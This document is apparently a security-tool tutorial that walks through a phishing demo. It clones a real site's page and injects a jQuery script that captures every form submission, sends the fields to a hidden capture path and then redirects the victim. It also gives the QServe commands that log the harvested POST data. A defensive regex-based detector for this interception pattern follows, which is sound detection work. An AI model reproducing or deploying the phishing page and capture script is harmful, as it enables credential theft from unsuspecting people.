MEH Security

QServe Phishing Demo

This demo utilizes QServe.

Windows x64 quick download

Go to the website and download the target page through Chrome.

Open the folder with VS Code or your favorite editor

Rename the .html file to index.html

Now create a new file called phish.js

Inside that file, we'll paste this code:

$(document).ready(function() {
    $("form").submit(function(e) {
        var form = $(this);
        var newUrl = form.attr('action');
        $.ajax({
            url: "/phish-dsafdsaasdfgsadffg",
            type: form.attr('method'),
            data: form.serialize(),
            error: function(e) {
                document.location.replace(newUrl);
            }
        });
        return false;
    });
});

As the last modification to the page, we'll add these two lines to the index.html file, somewhere inside the <head> tag.

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.js"></script>
<script src="/phish.js"></script>

Save the page, open the folder in a command prompt/terminal, and start qserve:

qserve -l -c

-l or --log means we log all activity

-c or --capture-post means we separately log POST data

Load the site (go to localhost), then enter some data into the form. Boom.

Since we used the -c option, not only is the data logged to the console, but it's also saved to POST_log.txt.

QServe makes this process identical on Windows and Linux (and maybe OSX?). Either enable logging, or just wait for the red text in your console.
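Seen from the defender's side, the phish.js pattern above (hook the form submit, serialize the fields, send them in the background to a path that is not the form's action, then redirect) can be recognized in a suspect page's script text. The following is an added example, not part of the original post or of QServe; the indicator names, the `triage` function and all sample inputs are constructed for illustration.

```javascript
// Added example: heuristic triage of a suspect page's markup and script text.
const INDICATORS = {
  submitHook: /\.submit\s*\(\s*function|addEventListener\s*\(\s*['"]submit['"]/,
  serializesForm: /\.serialize(?:Array)?\s*\(|new\s+FormData\s*\(/,
  backgroundSend: /\$\.(?:ajax|post)\s*\(|\bfetch\s*\(|XMLHttpRequest|sendBeacon\s*\(/,
  blocksNativeSubmit: /return\s+false\s*;|preventDefault\s*\(/,
  redirectsAfter: /location\.(?:replace|assign)\s*\(|location(?:\.href)?\s*=[^=]/,
};

// Collect the action attribute of every <form> in the page markup.
function formActions(html) {
  const actions = [];
  const re = /<form\b[^>]*?\baction\s*=\s*["']([^"']*)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) actions.push(m[1]);
  return actions;
}

// Literal request targets in the script: `url: "..."` options and fetch("...") calls.
function literalTargets(js) {
  const targets = [];
  const re = /(?:\burl\s*:\s*|\bfetch\s*\(\s*)["']([^"']+)["']/g;
  let m;
  while ((m = re.exec(js)) !== null) targets.push(m[1]);
  return targets;
}

function triage(html, js) {
  const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(js));
  const actions = formActions(html);
  // A hard-coded target that matches no form action means the data is sent
  // somewhere other than where the form says it goes.
  const strayTargets = literalTargets(js).filter((t) => !actions.includes(t));
  const intercepts = ["submitHook", "serializesForm", "backgroundSend", "blocksNativeSubmit"]
    .every((k) => hits.includes(k));
  let verdict = "clean";
  if (intercepts) verdict = strayTargets.length > 0 ? "likely-credential-intercept" : "review";
  return { hits, strayTargets, verdict };
}

// Constructed samples: the interception pattern and a benign validation handler.
const SAMPLE_HTML = '<form method="post" action="https://login.example.com/session"></form>';
const SAMPLE_SUSPECT = `$("form").submit(function(e){ var f=$(this); var u=f.attr('action');
  $.ajax({ url: "/collect-placeholder", type: f.attr('method'), data: f.serialize(),
    error: function(){ document.location.replace(u); } }); return false; });`;
const SAMPLE_BENIGN = `$("form").submit(function(e){
  if (!$("#user").val()) { e.preventDefault(); alert("Username required"); } });`;
```

These are regex heuristics for triage, so a "review" or "clean" verdict on minified or obfuscated script still warrants a manual look.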